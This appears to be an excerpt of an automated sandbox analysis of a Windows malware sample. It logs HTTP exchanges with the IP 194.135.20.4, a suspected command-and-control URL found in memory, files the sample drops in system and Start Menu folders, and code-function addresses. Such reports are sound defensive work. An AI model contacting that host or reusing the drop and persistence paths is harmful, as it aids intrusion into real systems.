                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 31 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 31 33 35 2e 32 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 32 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 31 33 35 2e 32 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 31 33 35 2e 32 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 31 33 35 2e 32 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.0000000003109000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003436000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.135.20.4
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3P
                            Source: teh76E2k50.exe, 00000000.00000002.2305640506.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.0000000003248000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.000000000305B000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003388000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.000000000392C000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Windows\SchCache\sihost.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Windows\SchCache\sihost.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Windows\SchCache\66fc9ff0ee96c2Jump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848A50DA00_2_00007FF848A50DA0
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C031F20_2_00007FF848C031F2
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C049800_2_00007FF848C04980
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848BF01450_2_00007FF848BF0145
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C038FA0_2_00007FF848C038FA
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C03AFC0_2_00007FF848C03AFC
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848BF55BD0_2_00007FF848BF55BD
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C034FC0_2_00007FF848C034FC
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C04FF80_2_00007FF848C04FF8
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF84915386F0_2_00007FF84915386F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A50DA07_2_00007FF848A50DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A9A00D7_2_00007FF848A9A00D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848AA9F387_2_00007FF848AA9F38
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A6B5DD7_2_00007FF848A6B5DD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A6CD057_2_00007FF848A6CD05
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A6CD527_2_00007FF848A6CD52
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A6CFAD7_2_00007FF848A6CFAD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A6CB2A7_2_00007FF848A6CB2A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A5F7C97_2_00007FF848A5F7C9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848BF01457_2_00007FF848BF0145
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C040FA7_2_00007FF848C040FA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C062FC7_2_00007FF848C062FC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C063FC7_2_00007FF848C063FC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848BF55BD7_2_00007FF848BF55BD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C02F797_2_00007FF848C02F79
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C058E87_2_00007FF848C058E8
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848C037FA7_2_00007FF848C037FA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF84915386F7_2_00007FF84915386F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF8491771487_2_00007FF849177148
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848A10DA014_2_00007FF848A10DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BB014514_2_00007FF848BB0145
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC42D014_2_00007FF848BC42D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC61FB14_2_00007FF848BC61FB
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BB55BD14_2_00007FF848BB55BD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC2F7914_2_00007FF848BC2F79
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC57A014_2_00007FF848BC57A0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC40F214_2_00007FF848BC40F2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848BC384214_2_00007FF848BC3842
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848A30DA020_2_00007FF848A30DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BE498020_2_00007FF848BE4980
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BD014520_2_00007FF848BD0145
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BE38FA20_2_00007FF848BE38FA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BE3AFB20_2_00007FF848BE3AFB
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BE34FB20_2_00007FF848BE34FB
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848BE4FF820_2_00007FF848BE4FF8
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF84913BAD020_2_00007FF84913BAD0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848A20DA026_2_00007FF848A20DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD31D326_2_00007FF848BD31D3
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BC014526_2_00007FF848BC0145
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD328C26_2_00007FF848BD328C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD32A426_2_00007FF848BD32A4
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD323C26_2_00007FF848BD323C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD33A426_2_00007FF848BD33A4
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD332426_2_00007FF848BD3324
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD332E26_2_00007FF848BD332E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD379426_2_00007FF848BD3794
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD36FA26_2_00007FF848BD36FA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD38EC26_2_00007FF848BD38EC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD383C26_2_00007FF848BD383C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848BD37FA26_2_00007FF848BD37FA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF84912BAD026_2_00007FF84912BAD0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF84912386F26_2_00007FF84912386F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A2F7C932_2_00007FF848A2F7C9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A3B5DD32_2_00007FF848A3B5DD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A3CD0532_2_00007FF848A3CD05
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A3CD5232_2_00007FF848A3CD52
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A3CFAD32_2_00007FF848A3CFAD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A3CB2A32_2_00007FF848A3CB2A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A6A00D32_2_00007FF848A6A00D
